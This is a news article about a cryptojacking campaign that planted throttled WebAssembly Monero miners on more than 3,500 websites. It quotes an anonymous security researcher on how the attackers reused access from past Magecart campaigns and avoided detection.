Monero Miner Malware Strikes Again: Over 3,500 Sites Hijacked in Cryptojacking Surge
Another day, another crypto heist—only this time, hackers aren't stealing your coins. They're stealing your CPU.
Cybercriminals just weaponized 3,500+ websites to mine Monero in the wildest case of 'free cloud computing' since Wall Street discovered blockchain ETFs.
How it works: The malware silently hijacks visitors' processing power to mine XMR—because why bother with ransomware when you can monetize someone else's laptop fans spinning at 100%?
The kicker? Monero's privacy features make tracing these attacks harder than explaining Bitcoin maximalism to a goldbug. Meanwhile, security teams are playing whack-a-mole with infected sites while crypto traders shrug—'At least it's not another exchange hack.'
‘Stay low, mine slow’
Over half a decade later, the tactic appears to be staging a quiet comeback: reconfiguring itself from noisy, CPU-choking scripts into low-profile miners built for stealth and persistence.
Rather than burning out devices, today’s campaigns spread quietly across thousands of sites, following a new playbook that, as c/side puts it, aims to “stay low, mine slow.”
That shift in strategy is no accident, according to an information security researcher familiar with the campaign who spoke to Decrypt on condition of anonymity.
The group appears to be reusing old infrastructure to prioritize long-term access and passive income, Decrypt was told.
“These groups most likely already control thousands of hacked WordPress sites and e-commerce stores from past Magecart campaigns,” the researcher told Decrypt.
Magecart campaigns are attacks where hackers inject malicious code into online checkout pages to steal payment information.
“Planting the miner was trivial, they simply added one more script to load the obfuscated JS, repurposing existing access,” the researcher said.
But what stands out, the researcher said, is how quietly the campaign operates, making it hard to detect with older methods.
“One way past cryptojacking scripts were detected was by their high CPU usage,” Decrypt was told. “This new wave avoids that by using throttled WebAssembly miners that stay under the radar, capping CPU usage and communicating over WebSockets.”
WebAssembly enables code to run faster inside a browser, while WebSockets maintain a constant connection to a server. Combined, these enable a crypto miner to work without drawing attention.
The risk isn't “directly targeting crypto users, since the script doesn't drain wallets, although technically, they could add a wallet drainer to the payload,” the anonymous researcher told Decrypt. “The real target is server and web app owners,” they added.
